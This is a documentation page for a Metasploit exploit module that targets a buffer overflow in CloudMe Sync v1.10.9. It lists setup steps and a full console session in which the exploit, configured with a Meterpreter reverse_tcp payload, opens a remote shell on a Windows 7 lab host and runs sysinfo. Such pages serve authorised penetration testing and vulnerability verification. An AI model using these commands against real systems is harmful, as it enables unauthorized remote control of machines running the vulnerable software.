Files
metasploit-gs/documentation/modules/exploit/windows/misc/cloudme_sync.md
T
Jacob Robles a23240a742 Update Documentation
[ticket: #9594]
2018-02-20 17:48:21 -06:00

42 lines
1.4 KiB
Markdown

## Description
This module exploits a buffer overflow vulnerability in [CloudMe Sync v1.10.9](https://www.cloudme.com/downloads/CloudMe_1109.exe).
## Verification Steps
1. Install CloudMe for Desktop version `v1.10.9`
2. Start the applicaton (you don't need to create an account)
3. Start `msfconsole`
4. Do `use exploit/windows/misc/cloudme_sync`
5. Do `set RHOST ip`
6. Do `set LHOST ip`
7. Do `exploit`
8. Verify the Meterpreter session is opened
## Scenarios
### CloudMe Sync client application on Windows 7 SP1 x86
```
msf > use exploit/windows/misc/cloudme_sync
msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148
RHOST => 172.16.40.148
msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/misc/cloudme_sync) > set LHOST 172.16.40.5
LHOST => 172.16.40.5
msf exploit(windows/misc/cloudme_sync) > exploit
[*] Started reverse TCP handler on 172.16.40.5:4444
[*] Sending stage (179779 bytes) to 172.16.40.148
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.148:57185) at 2018-02-19 12:35:21 +0000
meterpreter > sysinfo
Computer : PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : pt_PT
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
```